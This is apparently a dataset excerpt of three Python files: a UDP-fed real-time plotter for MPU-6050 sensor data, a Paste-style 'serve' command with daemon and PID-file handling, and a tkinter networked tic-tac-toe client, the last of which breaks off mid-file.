source
stringlengths
3
86
python
stringlengths
75
1.04M
plot_realtime.py
#!/usr/bin/env python3 import argparse import collections import json import socket import threading import time from typing import NamedTuple import numpy as np import matplotlib.pyplot as plt class Rotation(NamedTuple): roll: float pitch: float class ThreeVector(NamedTuple): """Basic x/y/z vector""" x: float y: float z: float class Measurement(NamedTuple): """MPU 6050 sensor readings""" timestamp: float temp: float rot: Rotation gyro: ThreeVector acc: ThreeVector @classmethod def deserialize(cls, data: bytes) -> "Measurement": timestamp = time.time() json_data = json.loads(data) roll = json_data["roll"] pitch = json_data["pitch"] temp = json_data["temp"] rot = Rotation(roll=roll, pitch=pitch) gyro = ThreeVector( x=json_data["gyro"]["x"], y=json_data["gyro"]["y"], z=json_data["gyro"]["z"], ) acc = ThreeVector( x=json_data["acc"]["x"], y=json_data["acc"]["y"], z=json_data["acc"]["z"], ) return Measurement( timestamp=timestamp, temp=temp, rot=rot, gyro=gyro, acc=acc, ) class UdpListener: """Listen for data over UDP""" def __init__(self, port: int): self._port = port self._addr = ("0.0.0.0", port) self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self._sock.settimeout(1) self._sock.bind(self._addr) print(f"Listening on UDP port: {port}") def get(self) -> Measurement: """Listen for data and parse it""" raw_data = self._sock.recvfrom(1024) return Measurement.deserialize(raw_data[0]) def close(self): self._sock.close() class DataPlotter: """Animate incoming data""" ROT = ["roll", "pitch"] def __init__(self, port: int, window_s: int): self._window_s = window_s self._listener = UdpListener(port) self._start_time = time.time() self._data = collections.deque() self._lock = threading.Lock() self._update_loop = threading.Thread(daemon=True, target=self._update_data) self._update_loop.start() # matplotlib stuff self._fig, ((self._acc_ax, self._rot_ax), (self._gyro_ax, self._empty)) = plt.subplots(2, 2, figsize=(19.2, 10.8), dpi=100) self._rot_lines = [] self._gyro_lines = [] self._acc_lines = [] self._rot_series = 2 self._ga_series = 3 fontsize = 24 legend_fontsize = 16 x_label = "Time since start (s)" for i in range(self._rot_series): rot_label = self.ROT[i] self._rot_lines.append( self._rot_ax.plot([], [], label=rot_label)[0]) self._rot_ax.set_xlabel(x_label, fontsize=fontsize) self._rot_ax.set_ylabel("Rotation (rad)", fontsize=fontsize) self._rot_ax.set_xlim([0, self._window_s]) self._rot_ax.legend(loc="upper left", fontsize=legend_fontsize) for i in range(self._ga_series): axis = chr(ord("x") + i) gyro_label = f"gyro.{axis}" acc_label = f"acc.{axis}" self._gyro_lines.append( self._gyro_ax.plot([], [], label=gyro_label)[0]) self._gyro_ax.set_xlabel(x_label, fontsize=fontsize) self._gyro_ax.set_ylabel("Gyro (rad/s)", fontsize=fontsize) self._gyro_ax.set_xlim([0, self._window_s]) self._gyro_ax.legend(loc="upper left", fontsize=legend_fontsize) self._acc_lines.append( self._acc_ax.plot([], [], label=acc_label)[0]) self._acc_ax.set_xlabel(x_label, fontsize=fontsize) self._acc_ax.set_ylabel("Acceleration (m/s^2)", fontsize=fontsize) self._acc_ax.set_xlim([0, self._window_s]) self._acc_ax.legend(loc="upper left", fontsize=legend_fontsize) self._empty.axis("off") self._fig.canvas.set_window_title("MPU-6050") self._fig.suptitle("MPU-6050 Time Series", fontsize=fontsize) self._fig.tight_layout() def _update_data(self): while True: try: point = self._listener.get() except socket.timeout: continue with self._lock: self._update_data_while_locked(point) def _update_data_while_locked(self, point: Measurement): self._data.append(point) now = time.time() while len(self._data): if self._data[0].timestamp < now - self._window_s: self._data.popleft() else: break def update(self): def _update_subplot(ax, timeseries, lines): assert len(timeseries) == len(lines) for (line, data) in zip(lines, timeseries): line.set_xdata(timestamp) line.set_ydata(data) if timestamp[-1] >= self._window_s: ax.set_xlim([timestamp[0], timestamp[-1]]) else: ax.set_xlim([0, self._window_s]) min_y = np.min(timeseries) min_y -= 0.1 * np.abs(min_y) max_y = np.max(timeseries) max_y += 0.1 * np.abs(max_y) ax.set_ylim([min_y, max_y]) with self._lock: data = list(self._data) if len(data) <= 1: return timestamp = np.array([d.timestamp - self._start_time for d in data]) acc_timeseries = -9.8 * np.array([ np.array([d.acc.x for d in data]), np.array([d.acc.y for d in data]), np.array([d.acc.z for d in data]), ]) gyro_timeseries = np.array([ np.array([d.gyro.x for d in data]), np.array([d.gyro.y for d in data]), np.array([d.gyro.z for d in data]), ]) rot_timeseries = np.array([ np.array([d.rot.roll for d in data]), np.array([d.rot.pitch for d in data]), ]) _update_subplot(self._rot_ax, rot_timeseries, self._rot_lines) _update_subplot(self._gyro_ax, gyro_timeseries, self._gyro_lines) _update_subplot(self._acc_ax, acc_timeseries, self._acc_lines) self._fig.canvas.draw() def close(self): self._listener.close() if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument( "-p", "--port", type=int, required=True, help="The UDP port to listen for new data packets on.", ) args = parser.parse_args() plt.ion() plotter = DataPlotter(args.port, 10) while True: plotter.update()
serve.py
# Most of this code is: # (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org) # Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php # The server command includes the additional header: # For discussion of daemonizing: # http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/278731 # Code taken also from QP: # http://www.mems-exchange.org/software/qp/ # From lib/site.py # Galaxy originally used PasteScript and PasteDeploy for application # loading, to maintain compatibility we've internalized some of that # code here, stripping out uneeded functionality. # All top level imports from each package moved here and organized import atexit import configparser import errno import grp import logging import optparse import os import pwd import re import resource import signal import socket import subprocess import sys import textwrap import threading import time from gettext import gettext as _ from logging.config import fileConfig from typing import Optional from .loadwsgi import loadapp, loadserver difflib = None # ---- from paste.script.bool_optparse -------------------------------- """ A subclass of ``optparse.OptionParser`` that allows boolean long options (like ``--verbose``) to also take arguments (like ``--verbose=true``). Arguments *must* use ``=``. """ class BoolOptionParser(optparse.OptionParser): def _process_long_opt(self, rargs, values): arg = rargs.pop(0) # Value explicitly attached to arg? Pretend it's the next # argument. if "=" in arg: (opt, next_arg) = arg.split("=", 1) rargs.insert(0, next_arg) had_explicit_value = True else: opt = arg had_explicit_value = False opt = self._match_long_opt(opt) option = self._long_opt[opt] if option.takes_value(): nargs = option.nargs if len(rargs) < nargs: if nargs == 1: self.error(_("%s option requires an argument") % opt) else: self.error(_("%s option requires %d arguments") % (opt, nargs)) elif nargs == 1: value = rargs.pop(0) else: value = tuple(rargs[0:nargs]) del rargs[0:nargs] elif had_explicit_value: value = rargs[0].lower().strip() del rargs[0:1] if value in ('true', 'yes', 'on', '1', 'y', 't'): value = None elif value in ('false', 'no', 'off', '0', 'n', 'f'): # Don't process return else: self.error(_('%s option takes a boolean value only (true/false)') % opt) else: value = None option.process(opt, value, values, self) # ---- from paste.script.command -------------------------------------- # (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org) # Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php class BadCommand(Exception): def __init__(self, message, exit_code=2): self.message = message self.exit_code = exit_code Exception.__init__(self, message) def _get_message(self): """Getter for 'message'; needed only to override deprecation in BaseException.""" return self.__message def _set_message(self, value): """Setter for 'message'; needed only to override deprecation in BaseException.""" self.__message = value # BaseException.message has been deprecated since Python 2.6. # To prevent DeprecationWarning from popping up over this # pre-existing attribute, use a new property that takes lookup # precedence. message = property(_get_message, _set_message) class NoDefault: pass # run and invoke methods moved below ServeCommand class Command: def __init__(self, name): self.command_name = name max_args = None max_args_error = 'You must provide no more than %(max_args)s arguments' min_args: Optional[int] = None min_args_error = 'You must provide at least %(min_args)s arguments' required_args = None # If this command takes a configuration file, set this to 1 or -1 # Then if invoked through #! the config file will be put into the positional # arguments -- at the beginning with 1, at the end with -1 takes_config_file: Optional[int] = None # Grouped in help messages by this: group_name = '' required_args = () description: Optional[str] = None usage = '' hidden = False # This is the default verbosity level; --quiet subtracts, # --verbose adds: default_verbosity = 0 # This is the default interactive state: default_interactive = 0 return_code = 0 BadCommand = BadCommand # Must define: # parser # summary # command() def run(self, args): self.parse_args(args) # Setup defaults: for name, default in [('verbose', 0), ('quiet', 0), ('interactive', False), ('overwrite', False)]: if not hasattr(self.options, name): setattr(self.options, name, default) if getattr(self.options, 'simulate', False): self.options.verbose = max(self.options.verbose, 1) self.interactive = self.default_interactive if getattr(self.options, 'interactive', False): self.interactive += self.options.interactive if getattr(self.options, 'no_interactive', False): self.interactive = False self.verbose = self.default_verbosity self.verbose += self.options.verbose self.verbose -= self.options.quiet self.simulate = getattr(self.options, 'simulate', False) # For #! situations: if os.environ.get('PASTE_CONFIG_FILE') and self.takes_config_file is not None: take = self.takes_config_file filename = os.environ.get('PASTE_CONFIG_FILE') if take == 1: self.args.insert(0, filename) elif take == -1: self.args.append(filename) else: assert 0, ( "Value takes_config_file must be None, 1, or -1 (not %r)" % take) if os.environ.get('PASTE_DEFAULT_QUIET'): self.verbose = 0 # Validate: if self.min_args is not None and len(self.args) < self.min_args: raise BadCommand( self.min_args_error % {'min_args': self.min_args, 'actual_args': len(self.args)}) if self.max_args is not None and len(self.args) > self.max_args: raise BadCommand( self.max_args_error % {'max_args': self.max_args, 'actual_args': len(self.args)}) for var_name, option_name in self.required_args: if not getattr(self.options, var_name, None): raise BadCommand( 'You must provide the option %s' % option_name) result = self.command() if result is None: return self.return_code else: return result def parse_args(self, args): if self.usage: usage = ' ' + self.usage else: usage = '' self.parser.usage = "%prog [options]{}\n{}".format( usage, self.summary) self.parser.prog = self._prog_name() if self.description: desc = self.description desc = textwrap.dedent(desc) self.parser.description = desc self.options, self.args = self.parser.parse_args(args) def _prog_name(self): return '{} {}'.format(os.path.basename(sys.argv[0]), self.command_name) ######################################## # Utility methods ######################################## def pad(self, s, length, dir='left'): if len(s) >= length: return s if dir == 'left': return s + ' ' * (length - len(s)) else: return ' ' * (length - len(s)) + s def _standard_parser(cls, verbose=True, interactive=False, no_interactive=False, simulate=False, quiet=False, overwrite=False): """ Create a standard ``OptionParser`` instance. Typically used like:: class MyCommand(Command): parser = Command.standard_parser() Subclasses may redefine ``standard_parser``, so use the nearest superclass's class method. """ parser = BoolOptionParser() if verbose: parser.add_option('-v', '--verbose', action='count', dest='verbose', default=0) if quiet: parser.add_option('-q', '--quiet', action='count', dest='quiet', default=0) if no_interactive: parser.add_option('--no-interactive', action="count", dest="no_interactive", default=0) if interactive: parser.add_option('-i', '--interactive', action='count', dest='interactive', default=0) if simulate: parser.add_option('-n', '--simulate', action='store_true', dest='simulate', default=False) if overwrite: parser.add_option('-f', '--overwrite', dest="overwrite", action="store_true", help="Overwrite files (warnings will be emitted for non-matching files otherwise)") return parser standard_parser = classmethod(_standard_parser) def quote_first_command_arg(self, arg): """ There's a bug in Windows when running an executable that's located inside a path with a space in it. This method handles that case, or on non-Windows systems or an executable with no spaces, it just leaves well enough alone. """ if sys.platform != 'win32' or ' ' not in arg: # Problem does not apply: return arg try: import win32api except ImportError: raise ValueError( "The executable %r contains a space, and in order to " "handle this issue you must have the win32api module " "installed" % arg) arg = win32api.GetShortPathName(arg) return arg def parse_vars(self, args): """ Given variables like ``['a=b', 'c=d']`` turns it into ``{'a': 'b', 'c': 'd'}`` """ result = {} for arg in args: if '=' not in arg: raise BadCommand( 'Variable assignment %r invalid (no "=")' % arg) name, value = arg.split('=', 1) result[name] = value return result def logging_file_config(self, config_file): """ Setup logging via the logging module's fileConfig function with the specified ``config_file``, if applicable. ConfigParser defaults are specified for the special ``__file__`` and ``here`` variables, similar to PasteDeploy config loading. """ parser = configparser.ConfigParser() parser.read([config_file]) if parser.has_section('loggers'): config_file = os.path.abspath(config_file) fileConfig(config_file, dict(__file__=config_file, here=os.path.dirname(config_file))) class NotFoundCommand(Command): def run(self, args): print('Command %r not known (you may need to run setup.py egg_info)' % self.command_name) commands = list() commands.sort() if not commands: print('No commands registered.') print('Have you installed Paste Script?') print('(try running python setup.py develop)') return 2 print('Known commands:') longest = max([len(n) for n, c in commands]) for name, command in commands: print(' {} {}'.format(self.pad(name, length=longest), command.load().summary)) return 2 # ---- From paste.script.serve ---------------------------------------- MAXFD = 1024 jython = sys.platform.startswith('java') class DaemonizeException(Exception): pass class ServeCommand(Command): min_args = 0 usage = 'CONFIG_FILE [start|stop|restart|status] [var=value]' takes_config_file = 1 summary = "Serve the described application" description: Optional[str] = """\ This command serves a web application that uses a paste.deploy configuration file for the server and application. If start/stop/restart is given, then --daemon is implied, and it will start (normal operation), stop (--stop-daemon), or do both. You can also include variable assignments like 'http_port=8080' and then use %(http_port)s in your config files. """ # used by subclasses that configure apps and servers differently requires_config_file = True parser = Command.standard_parser(quiet=True) parser.add_option('-n', '--app-name', dest='app_name', metavar='NAME', help="Load the named application (default main)") parser.add_option('-s', '--server', dest='server', metavar='SERVER_TYPE', help="Use the named server.") parser.add_option('--server-name', dest='server_name', metavar='SECTION_NAME', help="Use the named server as defined in the configuration file (default: main)") if hasattr(os, 'fork'): parser.add_option('--daemon', dest="daemon", action="store_true", help="Run in daemon (background) mode") parser.add_option('--pid-file', dest='pid_file', metavar='FILENAME', help="Save PID to file (default to paster.pid if running in daemon mode)") parser.add_option('--log-file', dest='log_file', metavar='LOG_FILE', help="Save output to the given log file (redirects stdout)") parser.add_option('--reload', dest='reload', action='store_true', help="Use auto-restart file monitor") parser.add_option('--reload-interval', dest='reload_interval', default=1, help="Seconds between checking files (low number can cause significant CPU usage)") parser.add_option('--monitor-restart', dest='monitor_restart', action='store_true', help="Auto-restart server if it dies") parser.add_option('--status', action='store_true', dest='show_status', help="Show the status of the (presumably daemonized) server") if hasattr(os, 'setuid'): # I don't think these are available on Windows parser.add_option('--user', dest='set_user', metavar="USERNAME", help="Set the user (usually only possible when run as root)") parser.add_option('--group', dest='set_group', metavar="GROUP", help="Set the group (usually only possible when run as root)") parser.add_option('--stop-daemon', dest='stop_daemon', action='store_true', help='Stop a daemonized server (given a PID file, or default paster.pid file)') if jython: parser.add_option('--disable-jython-reloader', action='store_true', dest='disable_jython_reloader', help="Disable the Jython reloader") _scheme_re = re.compile(r'^[a-z][a-z]+:', re.I) default_verbosity = 1 _reloader_environ_key = 'PYTHON_RELOADER_SHOULD_RUN' _monitor_environ_key = 'PASTE_MONITOR_SHOULD_RUN' possible_subcommands = ('start', 'stop', 'restart', 'status') def command(self): if self.options.stop_daemon: return self.stop_daemon() if not hasattr(self.options, 'set_user'): # Windows case: self.options.set_user = self.options.set_group = None # @@: Is this the right stage to set the user at? self.change_user_group( self.options.set_user, self.options.set_group) if self.requires_config_file: if not self.args: raise BadCommand('You must give a config file') app_spec = self.args[0] if len(self.args) > 1 and self.args[1] in self.possible_subcommands: cmd = self.args[1] restvars = self.args[2:] else: cmd = None restvars = self.args[1:] else: app_spec = "" if self.args and self.args[0] in self.possible_subcommands: cmd = self.args[0] restvars = self.args[1:] else: cmd = None restvars = self.args[:] if (getattr(self.options, 'daemon', False) and getattr(self.options, 'reload', False)): raise BadCommand('The --daemon and --reload options may not be used together') jython_monitor = False if self.options.reload: if jython and not self.options.disable_jython_reloader: # JythonMonitor raises the special SystemRestart # exception that'll cause the Jython interpreter to # reload in the existing Java process (avoiding # subprocess startup time) try: from paste.reloader import JythonMonitor except ImportError: pass else: jython_monitor = JythonMonitor(poll_interval=int( self.options.reload_interval)) if self.requires_config_file: jython_monitor.watch_file(self.args[0]) if not jython_monitor: if os.environ.get(self._reloader_environ_key): from paste import reloader if self.verbose > 1: print('Running reloading file monitor') reloader.install(int(self.options.reload_interval)) if self.requires_config_file: reloader.watch_file(self.args[0]) else: return self.restart_with_reloader() if cmd not in (None, 'start', 'stop', 'restart', 'status'): raise BadCommand( 'Error: must give start|stop|restart (not %s)' % cmd) if cmd == 'status' or self.options.show_status: return self.show_status() if cmd == 'restart' or cmd == 'stop': result = self.stop_daemon() if result: print("Could not stop daemon") # It's ok to continue trying to restart if stop_daemon returns # a 1, otherwise shortcut and return. if cmd == 'restart' and result != 1: return result if cmd == 'stop': return result self.options.daemon = True if cmd == 'start': self.options.daemon = True app_name = self.options.app_name vars = self.parse_vars(restvars) if not self._scheme_re.search(app_spec): app_spec = 'config:' + app_spec server_name = self.options.server_name if self.options.server: server_spec = 'egg:PasteScript' assert server_name is None server_name = self.options.server else: server_spec = app_spec base = os.getcwd() if getattr(self.options, 'daemon', False): if not self.options.pid_file: self.options.pid_file = 'paster.pid' if not self.options.log_file: self.options.log_file = 'paster.log' # Ensure the log file is writeable if self.options.log_file: try: writeable_log_file = open(self.options.log_file, 'a') except OSError as ioe: msg = 'Error: Unable to write to log file: %s' % ioe raise BadCommand(msg) writeable_log_file.close() # Ensure the pid file is writeable if self.options.pid_file: try: writeable_pid_file = open(self.options.pid_file, 'a') except OSError as ioe: msg = 'Error: Unable to write to pid file: %s' % ioe raise BadCommand(msg) writeable_pid_file.close() if getattr(self.options, 'daemon', False): try: self.daemonize() except DaemonizeException as ex: if self.verbose > 0: print(str(ex)) return if (self.options.monitor_restart and not os.environ.get(self._monitor_environ_key)): return self.restart_with_monitor() if self.options.pid_file: self.record_pid(self.options.pid_file) if self.options.log_file: stdout_log = LazyWriter(self.options.log_file, 'a') sys.stdout = stdout_log sys.stderr = stdout_log logging.basicConfig(stream=stdout_log) log_fn = app_spec if log_fn.startswith('config:'): log_fn = app_spec[len('config:'):] elif log_fn.startswith('egg:'): log_fn = None if log_fn: log_fn = os.path.join(base, log_fn) self.logging_file_config(log_fn) server = loadserver(server_spec, name=server_name, relative_to=base, global_conf=vars) app = loadapp(app_spec, name=app_name, relative_to=base, global_conf=vars) if self.verbose > 0: if hasattr(os, 'getpid'): msg = 'Starting server in PID %i.' % os.getpid() else: msg = 'Starting server.' print(msg) def serve(): try: server(app) except (SystemExit, KeyboardInterrupt) as e: if self.verbose > 1: raise if str(e): msg = ' ' + str(e) else: msg = '' print('Exiting%s (-v to see traceback)' % msg) except AttributeError as e: # Capturing bad error response from paste if str(e) == "'WSGIThreadPoolServer' object has no attribute 'thread_pool'": raise OSError(98, 'Address already in use') else: raise AttributeError(e) if jython_monitor: # JythonMonitor has to be ran from the main thread threading.Thread(target=serve).start() print('Starting Jython file monitor') jython_monitor.periodic_reload() else: serve() def daemonize(self): pid = live_pidfile(self.options.pid_file) if pid: raise DaemonizeException( "Daemon is already running (PID: %s from PID file %s)" % (pid, self.options.pid_file)) if self.verbose > 0: print('Entering daemon mode') pid = os.fork() if pid: # The forked process also has a handle on resources, so we # *don't* want proper termination of the process, we just # want to exit quick (which os._exit() does) os._exit(0) # Make this the session leader os.setsid() # Fork again for good measure! pid = os.fork() if pid: os._exit(0) # @@: Should we set the umask and cwd now? maxfd = resource.getrlimit(resource.RLIMIT_NOFILE)[1] if maxfd == resource.RLIM_INFINITY: maxfd = MAXFD # Iterate through and close all file descriptors. for fd in range(0, maxfd): try: os.close(fd) except OSError: # ERROR, fd wasn't open to begin with (ignored) pass if hasattr(os, "devnull"): REDIRECT_TO = os.devnull else: REDIRECT_TO = "/dev/null" os.open(REDIRECT_TO, os.O_RDWR) # standard input (0) # Duplicate standard input to standard output and standard error. os.dup2(0, 1) # standard output (1) os.dup2(0, 2) # standard error (2) def record_pid(self, pid_file): pid = os.getpid() if self.verbose > 1: print(f'Writing PID {pid} to {pid_file}') f = open(pid_file, 'w') f.write(str(pid)) f.close() atexit.register(_remove_pid_file, pid, pid_file, self.verbose) def stop_daemon(self): pid_file = self.options.pid_file or 'paster.pid' if not os.path.exists(pid_file): print('No PID file exists in %s' % pid_file) return 1 pid = read_pidfile(pid_file) if not pid: print("Not a valid PID file in %s" % pid_file) return 1 pid = live_pidfile(pid_file) if not pid: print("PID in %s is not valid (deleting)" % pid_file) try: os.unlink(pid_file) except OSError as e: print("Could not delete: %s" % e) return 2 return 1 for _i in range(10): if not live_pidfile(pid_file): break os.kill(pid, signal.SIGTERM) time.sleep(1) else: print("failed to kill web process %s" % pid) return 3 if os.path.exists(pid_file): os.unlink(pid_file) return 0 def show_status(self): pid_file = self.options.pid_file or 'paster.pid' if not os.path.exists(pid_file): print('No PID file %s' % pid_file) return 1 pid = read_pidfile(pid_file) if not pid: print('No PID in file %s' % pid_file) return 1 pid = live_pidfile(pid_file) if not pid: print(f'PID {pid} in {pid_file} is not running') return 1 print('Server running in PID %s' % pid) return 0 def restart_with_reloader(self): self.restart_with_monitor(reloader=True) def restart_with_monitor(self, reloader=False): if self.verbose > 0: if reloader: print('Starting subprocess with file monitor') else: print('Starting subprocess with monitor parent') while 1: args = [self.quote_first_command_arg(sys.executable)] + sys.argv new_environ = os.environ.copy() if reloader: new_environ[self._reloader_environ_key] = 'true' else: new_environ[self._monitor_environ_key] = 'true' proc = None try: try: _turn_sigterm_into_systemexit() proc = subprocess.Popen(args, env=new_environ) exit_code = proc.wait() proc = None except KeyboardInterrupt: print('^C caught in monitor process') if self.verbose > 1: raise return 1 finally: if proc is not None and hasattr(os, 'kill'): try: os.kill(proc.pid, signal.SIGTERM) except OSError: pass if reloader: # Reloader always exits with code 3; but if we are # a monitor, any exit code will restart if exit_code != 3: return exit_code if self.verbose > 0: print('-' * 20, 'Restarting', '-' * 20) def change_user_group(self, user, group): if not user and not group: return uid = gid = None if group: try: gid = int(group) group = grp.getgrgid(gid).gr_name except ValueError: try: entry = grp.getgrnam(group) except KeyError: raise BadCommand( "Bad group: %r; no such group exists" % group) gid = entry.gr_gid try: uid = int(user) user = pwd.getpwuid(uid).pw_name except ValueError: try: entry = pwd.getpwnam(user) except KeyError: raise BadCommand( "Bad username: %r; no such user exists" % user) if not gid: gid = entry.pw_gid uid = entry.pw_uid if self.verbose > 0: print('Changing user to {}:{} ({}:{})'.format( user, group or '(unknown)', uid, gid)) if hasattr(os, 'initgroups'): os.initgroups(user, gid) else: os.setgroups([e.gr_gid for e in grp.getgrall() if user in e.gr_mem] + [gid]) if gid: os.setgid(gid) if uid: os.setuid(uid) class LazyWriter: """ File-like object that opens a file lazily when it is first written to. """ def __init__(self, filename, mode='w'): self.filename = filename self.fileobj = None self.lock = threading.Lock() self.mode = mode def open(self): if self.fileobj is None: self.lock.acquire() try: if self.fileobj is None: self.fileobj = open(self.filename, self.mode) finally: self.lock.release() return self.fileobj def write(self, text): fileobj = self.open() fileobj.write(text) fileobj.flush() def writelines(self, text): fileobj = self.open() fileobj.writelines(text) fileobj.flush() def flush(self): self.open().flush() def live_pidfile(pidfile): """(pidfile:str) -> int | None Returns an int found in the named file, if there is one, and if there is a running process with that process id. Return None if no such process exists. """ pid = read_pidfile(pidfile) if pid: try: os.kill(int(pid), 0) return pid except OSError as e: if e.errno == errno.EPERM: return pid return None def read_pidfile(filename): if os.path.exists(filename): try: f = open(filename) content = f.read() f.close() return int(content.strip()) except (ValueError, OSError): return None else: return None def _remove_pid_file(written_pid, filename, verbosity): current_pid = os.getpid() if written_pid != current_pid: # A forked process must be exiting, not the process that # wrote the PID file return if not os.path.exists(filename): return f = open(filename) content = f.read().strip() f.close() try: pid_in_file = int(content) except ValueError: pass else: if pid_in_file != current_pid: print("PID file {} contains {}, not expected PID {}".format( filename, pid_in_file, current_pid)) return if verbosity > 0: print("Removing PID file %s" % filename) try: os.unlink(filename) return except OSError as e: # Record, but don't give traceback print("Cannot remove PID file: %s" % e) # well, at least lets not leave the invalid PID around... try: f = open(filename, 'w') f.write('') f.close() except OSError as e: print(f'Stale PID left in file: {filename} ({e:e})') else: print('Stale PID removed') def ensure_port_cleanup(bound_addresses, maxtries=30, sleeptime=2): """ This makes sure any open ports are closed. Does this by connecting to them until they give connection refused. Servers should call like:: import paste.script ensure_port_cleanup([80, 443]) """ atexit.register(_cleanup_ports, bound_addresses, maxtries=maxtries, sleeptime=sleeptime) def _cleanup_ports(bound_addresses, maxtries=30, sleeptime=2): # Wait for the server to bind to the port. for bound_address in bound_addresses: for _i in range(maxtries): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect(bound_address) except OSError as e: if e.errno != errno.ECONNREFUSED: raise break else: time.sleep(sleeptime) else: raise SystemExit('Timeout waiting for port.') sock.close() def _turn_sigterm_into_systemexit(): """ Attempts to turn a SIGTERM exception into a SystemExit exception. """ def handle_term(signo, frame): raise SystemExit signal.signal(signal.SIGTERM, handle_term) # ---- from paste.script.command -------------------------------------- python_version = sys.version.splitlines()[0].strip() parser = optparse.OptionParser(add_help_option=False, # version='%s from %s (python %s)' # % (dist, dist.location, python_version), usage='%prog [paster_options] COMMAND [command_options]') parser.add_option( '-h', '--help', action='store_true', dest='do_help', help="Show this help message") parser.disable_interspersed_args() # @@: Add an option to run this in another Python interpreter commands = { 'serve': ServeCommand } def run(args=None): if (not args and len(sys.argv) >= 2 and os.environ.get('_') and sys.argv[0] != os.environ['_'] and os.environ['_'] == sys.argv[1]): # probably it's an exe execution args = ['exe', os.environ['_']] + sys.argv[2:] if args is None: args = sys.argv[1:] options, args = parser.parse_args(args) options.base_parser = parser if options.do_help: args = ['help'] + args if not args: print('Usage: %s COMMAND' % sys.argv[0]) args = ['help'] command_name = args[0] if command_name not in commands: command = NotFoundCommand else: command = commands[command_name] invoke(command, command_name, options, args[1:]) def invoke(command, command_name, options, args): try: runner = command(command_name) exit_code = runner.run(args) except BadCommand as e: print(e) exit_code = e.exit_code sys.exit(exit_code)
StatePlayGame.py
from ButtonClickHandler import PlayGameButtons as P from GUI import root, tk, MyButton from datetime import datetime import threading import socket import json import time import sys import GUI class Client(object): def __init__(self, game): try: self.game = game self.server = ('localhost', 9090) self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.s.settimeout(3) self.s.connect(self.server) self.s.settimeout(None) self.disconnect = False self.init_client_on_server = False self.start() except Exception as e: print('AFTER WAITING 3 SECONDS') print('CONNECTION FAILED') print(e) P.main_menu_click() # receiving jsons from Server and apply specific actions to Game def receiving(self, name, sock): print('RECEIVING MODE') while not self.disconnect: try: while True: if not self.init_client_on_server: try: self.s.settimeout(3) data = self.s.recv(1024) self.s.settimeout(None) self.handle_server_response(data) self.init_client_on_server = True except Exception as e: print('On init phase: ', e) self.disconnect = True break else: # normal mode data = self.s.recv(1024) self.handle_server_response(data) except Exception as e: print(f'while receiving an error occured: {e}') self.disconnect = True print('STOP RECEIVING DATA FROM SERVER') self.game.stop_thread_and_go_to_MainMenu() def response(self, player, used_cell): r = { 'time': datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'player': player, 'used_cell': used_cell, } r = json.dumps(r, ensure_ascii=False).encode("utf-8") self.s.sendall(r) def handle_server_response(self, r): print('DATA RECEIVED FROM SERVER') f = r.decode("utf-8") if f == 'Are you connected?)': print(f'Server asked: {f}') self.init_client_on_server = True self.game.update_status(1) else: r = json.loads(r) print(json.dumps(r, indent=4, sort_keys=True, ensure_ascii=False)) cmd = r['command'] print(f'cmd = {cmd}') if cmd == 'init_player': self.game.me = r['player'] GUI.root.title(f"[ID: {r['player']['addr'][1]}] {r['player']['nickname']} - {r['player']['symbol']}") GUI.root.update() print('client was successfuly initialized with') if 'loose' in cmd: self.game.draw_BACK_TO_MAIN_MENU_button() self.game.update_status(3) self.game.highlight_win_combo(cmd[-1], 'red') if 'victory' in cmd: self.game.draw_BACK_TO_MAIN_MENU_button() self.game.update_status(4) self.game.highlight_win_combo(cmd[-1], 'green') if cmd == 'draw': self.game.draw_BACK_TO_MAIN_MENU_button() self.game.update_status(5) if cmd == 'redraw_playboard': print('executing "redraw_playboard"') self.game.redraw_playboard(r['used_cells']) if cmd == 'unblock_playboard': print('executing "unblock_playboard"') self.game.update_status(2) self.game.unblock_playboard(r['used_cells']) if cmd == 'opponent left hte game': self.game.draw_BACK_TO_MAIN_MENU_button() self.game.update_status(7) def start(self): self.rT = threading.Thread(target=self.receiving, args=("SomeGoodFuncName", self.s)) self.rT.daemon = False self.rT.start() class StatePlayGame(object): def __init__(self): print('STATE_PLAYBOARD') self.me = {} # player info self.type = '' self.exit = False self.GAME_WIDTH = GUI.GAME_WIDTH self.GAME_HEIGHT = GUI.GAME_HEIGHT self.BTN_WIDTH = 0.45 * self.GAME_WIDTH self.BTN_HEIGHT = 0.14 * self.GAME_HEIGHT self.play_board_size = 500 self.btn_size = 0.3 * self.play_board_size # playboard background self.container = tk.Label(GUI.SCREEN, bg='black') self.container.place(rely=0.5, relx=0.5, anchor=tk.CENTER, width=self.play_board_size, height=self.play_board_size ) self.container.update() formula = self.btn_size + 0.05 * self.play_board_size y = [-2, formula - 2, formula * 2] # placing buttons from right to left, # naming buttons from left to rigth fix = [2, 1, 0] self.btn_dict = {} for i in [1, 2, 3]: for j in [2, 1, 0]: self.btn_dict.update({ f'btn_{i*3 - fix[j]}': tk.Button(self.container, text='', font=('Helvetica', 100, 'bold'), borderwidth=0 ) }) self.btn_dict[f'btn_{i*3 - fix[j]}'].place(x=(j * formula - 2), y=y[i - 1], width=int(self.btn_size), height=int(self.btn_size) ) self.btn_dict['btn_1'].config(command=lambda: self.draw_X_O('btn_1')) self.btn_dict['btn_2'].config(command=lambda: self.draw_X_O('btn_2')) self.btn_dict['btn_3'].config(command=lambda: self.draw_X_O('btn_3')) self.btn_dict['btn_4'].config(command=lambda: self.draw_X_O('btn_4')) self.btn_dict['btn_5'].config(command=lambda: self.draw_X_O('btn_5')) self.btn_dict['btn_6'].config(command=lambda: self.draw_X_O('btn_6')) self.btn_dict['btn_7'].config(command=lambda: self.draw_X_O('btn_7')) self.btn_dict['btn_8'].config(command=lambda: self.draw_X_O('btn_8')) self.btn_dict['btn_9'].config(command=lambda: self.draw_X_O('btn_9')) style = tk.ttk.Style() style.configure('KEKOS.TButton', font=('Verdana', 20, 'bold')) style_enter = tk.ttk.Style() style_enter.configure('Enter.TButton', foreground='green', font=('Verdana', 20, 'bold') ) style_leave = tk.ttk.Style() style_leave.configure('Leave.TButton', bakcground='red', font=('Verdana', 20, 'bold') ) 